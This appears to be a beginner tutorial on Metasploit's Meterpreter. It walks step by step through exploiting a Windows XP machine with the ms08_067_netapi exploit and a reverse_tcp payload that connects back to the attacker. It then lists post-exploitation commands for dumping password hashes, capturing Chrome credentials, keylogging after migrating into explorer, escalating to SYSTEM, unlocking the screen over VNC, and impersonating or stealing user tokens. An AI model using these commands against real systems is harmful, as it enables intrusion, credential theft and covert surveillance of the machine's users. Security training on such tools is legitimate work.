Metasploit 4

Metasploit 4

Meterpreter part 1

What is meterpreter ?

Meterpreter is payload that uses DLL injection technique in memory so ,
Antiviruses software can't detect it because meterpreter writes nothing to disk
Meterpreter uses encrypted communications.

Now let's try to hack windows machine (Windows XP) and set Meterpreter as a payload 

First we will use ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi

Then we set the remote host (victim)

Then we set meterpreter as a payload
set PAYLOAD windows/meterpreter/reverse_tcp

we set the IP address of the local machine (attacker) so that meterpreter can connect back to the attacker machine


Then ...



The exploit (ms08_067_netapi) succeed and the remote machine (victim) connecting back to the local machine (attacker) 
Now we have a Meterpreter session open 

Let's explore some basic Meterpreter commands:

1- sysinfo
collect information about the system

2- screenshot
capturing the current desktop

3- hashdump
Dumping the password hash

Note: Meterpreter containe many of scripts such as (vnc, winenum , chrome_enum, killav ...)
To run a scripr run script_name for exmple(run chrome_enum) to capture chrome credentials
To list all meterpreter scripts jsu type run and hit tab twice

4- keystrokes
keystroke is Keyboard Capturing software, keystroke records the keys struck on a keyboard.

A- migrate to explorer
First we use ps command to view all process on the remote machine to get the PID of explorer process (explorer PID = 1432)
Then we do migration
what is migrate ?
To migrate meterpreter session from one process to another to avoid loosing the session if the process is killed

migrate 1432

B- run keylog_recorder

Note : the output file is located in "/root/.msf4/logs/scripts/keylogrecorder/"

Now on windows try to type on keyboard
ping then CTRL+C

C- To interrupt keystroker hit CTRL+C

now let's view the dumped file
cat /root/.msf4/logs/scripts/keylogrecorder/

As expected

5-Privilege Escalation

To get system as admin user (Full access full privilege)

A- Load priv extension 
use priv

B- To get system as admin 

C- To verify the admin privilege

6- VNC

VNC(Virtual Network Computing) is a remote control desktop software 

To install VNC on the remote machine
run vnc

To unlock the remote screen
run screen_unlock

7- Token impersonation

How to impersonate user tokens to allow you to access to system or network without having to provide credentials.

There are two types of tokens
1- delegate : For interactive logons suck as (remote desktop and machine logging)
2- impersonate : For non-interactive logons such as domain logon

To do so you have to load incognito extension

use incognito

Then to list the tokens available
list_tokens -u

To get the tokens of SYSTEM
impersonate_token "NT AUTHORITY\\SYSTEM"

Now we currently running as SYSTEM (Full access)


use ps command to list all running processes , Then you can steal the token of the owner of any process

A- ps

Now if i want to run as Administrator (owner of the process wuauctl.exe) PID = 1528 OR for sure  any other process that owned by Administrator

B- steal_token 1528